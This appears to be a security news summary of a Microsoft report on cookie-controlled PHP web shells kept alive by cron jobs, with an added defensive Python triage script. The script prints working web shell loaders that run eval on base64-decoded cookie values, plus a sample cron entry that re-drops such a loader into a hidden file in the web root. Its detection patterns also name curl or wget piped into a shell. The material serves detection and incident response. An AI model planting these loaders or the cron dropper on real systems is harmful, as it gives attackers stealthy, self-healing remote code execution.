Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers

The Microsoft Defender Security Research Team reports that threat actors are increasingly using HTTP cookies as the control channel for PHP web shells on Linux servers. The shell stays dormant for ordinary requests and only executes attacker instructions when a request carries a specific cookie, so it blends into normal traffic. Cookie-gated activation, obfuscated loaders and cron-based recreation of the loader together form a self-healing persistence mechanism that evades many traditional inspection and logging controls; default web server access logs record the request line but not the Cookie header, so the control channel never appears in them.

Keypoints

  • Threat actors use HTTP cookies as a stealthy gate for PHP web shells, avoiding URL parameters and request bodies, the two places access logging and request inspection normally look.
  • PHP's $_COOKIE superglobal already delivers every cookie as a parsed key/value pair, so a shell can read instructions from it and trigger execution without any additional parsing code.
  • Observed implementations include obfuscated PHP loaders, payloads split across several cookies and reassembled server-side before execution, and single-cookie markers whose presence triggers command execution or a file upload.
  • Persistence is achieved via cron jobs that recreate the loader if it is removed, forming a self-healing remote code execution channel: deleting the web shell alone does not evict the attacker.
  • Microsoft recommends MFA for hosting control panels and SSH, monitoring for unusual logins, auditing cron jobs, checking web directories for suspicious or recently modified files, and restricting shell execution from PHP (for example by disabling exec-type functions in the PHP configuration).
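
The two audit steps above (check cron for entries that re-drop a loader, check web directories for cookie-gated PHP) as a worked example. This is an added heuristic triage script, not Microsoft's tooling or detection logic: the PHP samples, the crontab, the indicator names and the path /var/www/html/wp-content/uploads/.cache.php are constructed for illustration, and the regexes are the editor's own heuristics, not rules from the report. It flags PHP that reads $_COOKIE and feeds it to an exec or file sink, recognises the multi-cookie reassembly pattern, and decodes base64 blobs found in cron commands to triage the dropped file before it ever lands on disk.

```python
"""Heuristic triage for cookie-gated PHP loaders and self-healing cron entries.
Added example; samples below are constructed, not from the Microsoft report."""
import base64
import re

# PHP sinks that turn attacker-controlled bytes into code or commands.
EXEC_SINKS = ("eval", "assert", "system", "shell_exec", "exec", "passthru",
              "popen", "proc_open", "create_function")
# Decoders usually chained in front of a sink so the payload stays unreadable on disk.
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13", "hex2bin")
# Sinks that drop a file instead of executing (the "upload" style of cookie marker).
FILE_SINKS = ("file_put_contents", "move_uploaded_file", "fwrite")
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx", "public_html", "htdocs")
_SINK_RE, _DEC_RE = "|".join(EXEC_SINKS), "|".join(DECODERS)
_B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed sample 1: loader that only fires when cookie 'sid' exists and
# reassembles its payload from cookies p0..p3 before eval.
LOADER_PHP = """<?php
if (isset($_COOKIE['sid'])) {
    $p = '';
    foreach (range(0, 3) as $i) { $p .= $_COOKIE['p' . $i] ?? ''; }  // segments
    @eval(base64_decode($p));
}"""
# Constructed sample 2: single-cookie marker, the form a cron job re-drops below.
CRON_DROPPED_PHP = "<?php if(isset($_COOKIE['k'])){@eval(base64_decode($_COOKIE['k']));}"
# Constructed sample 3: legitimate cookie use (theme/language), must not be flagged.
BENIGN_PHP = """<?php
$lang = $_COOKIE['lang'] ?? 'en';
if (isset($_COOKIE['theme'])) { $theme = htmlspecialchars($_COOKIE['theme']); }
echo "<html lang=\\"$lang\\">";"""


def scan_php_source(src: str) -> list[str]:
    """Indicator names for one PHP source; empty list means no $_COOKIE use at all."""
    if not re.search(r"\$_COOKIE\b", src):
        return []
    found = []
    if re.search(r"if\s*\([^)]*\$_COOKIE", src):            # activation gated on a cookie
        found.append("cookie-gated")
    if re.search(r"\.=\s*\$_COOKIE", src) or re.search(r"\$_COOKIE\s*\[[^\]]*\.\s*\$\w+", src):
        found.append("cookie-segmented payload")            # reassembled from several cookies
    for group, label in ((EXEC_SINKS, "exec sink"), (DECODERS, "decoder"), (FILE_SINKS, "file sink")):
        for name in group:
            if re.search(rf"\b{name}\s*\(", src):
                found.append(f"{label}: {name}")
    # Strongest signal: sink(decoder*($_COOKIE[...])), e.g. eval(base64_decode($_COOKIE['k'])).
    if re.search(rf"\b(?:{_SINK_RE})\s*\((?:\s*(?:{_DEC_RE})\s*\()*\s*\$_COOKIE", src):
        found.append("exec sink fed by cookie")
    return found


def is_suspicious_php(indicators: list[str]) -> bool:
    """Cookie use alone is normal; cookie use next to an exec or file sink is not."""
    return any(i.startswith(("exec sink", "file sink")) for i in indicators)


def scan_crontab(text: str) -> list[tuple[str, list[str]]]:
    """(line, indicators) for each cron entry that looks like it re-drops a web shell."""
    results = []
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                            # @reboot, @hourly, ...
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue
            minute, command = parts
        else:
            parts = line.split(None, 5)                     # m h dom mon dow command
            if len(parts) < 6:
                continue                                    # VAR=value line or malformed
            minute, command = parts[0], parts[5]
        found = []
        if minute == "*" or (minute.startswith("*/") and minute[2:].isdigit() and int(minute[2:]) <= 5):
            found.append("runs every few minutes")          # tight loop to "heal" fast
        if any(r in command for r in WEB_ROOTS) and re.search(r">>?|\btee\b|\bcp\b|\bmv\b", command):
            found.append("writes into web root")
        if re.search(r"base64\s+(-d|--decode)|openssl\s+enc\s+-d|\bgunzip\b|\bxxd\s+-r", command):
            found.append("decodes inline payload")
        if re.search(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|php)\b", command):
            found.append("pipes download into interpreter")
        for blob in _B64_RE.findall(command):               # triage the embedded file itself
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            inner = scan_php_source(decoded)
            if is_suspicious_php(inner):
                found.append("embedded PHP loader: " + ", ".join(inner))
        if found:
            results.append((line, found))
    return results


# Constructed root crontab: two benign entries and one self-healing dropper.
SAMPLE_CRONTAB = "\n".join([
    "# constructed sample crontab for illustration",
    'MAILTO=""',
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "@reboot /usr/local/bin/start-queue-worker.sh",
    "*/2 * * * * echo " + base64.b64encode(CRON_DROPPED_PHP.encode()).decode()
    + " | base64 -d > /var/www/html/wp-content/uploads/.cache.php",
])

if __name__ == "__main__":
    for name, src in {"loader.php": LOADER_PHP, "theme.php": BENIGN_PHP}.items():
        ind = scan_php_source(src)
        print(name, "SUSPICIOUS" if is_suspicious_php(ind) else "ok", ind)
    for line, ind in scan_crontab(SAMPLE_CRONTAB):
        print("cron:", line[:50] + "...", ind)
```

On a real host, feed scan_php_source the contents of every .php file under the document root (including dotfiles and upload directories, where such loaders are usually dropped) and scan_crontab the output of crontab -l for every user plus /etc/cron.d/*; treat the cron findings as the higher priority, since removing the shell without the cron entry only buys a couple of minutes.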

Read More: https://thehackernews.com/2026/04/microsoft-details-cookie-controlled-php.html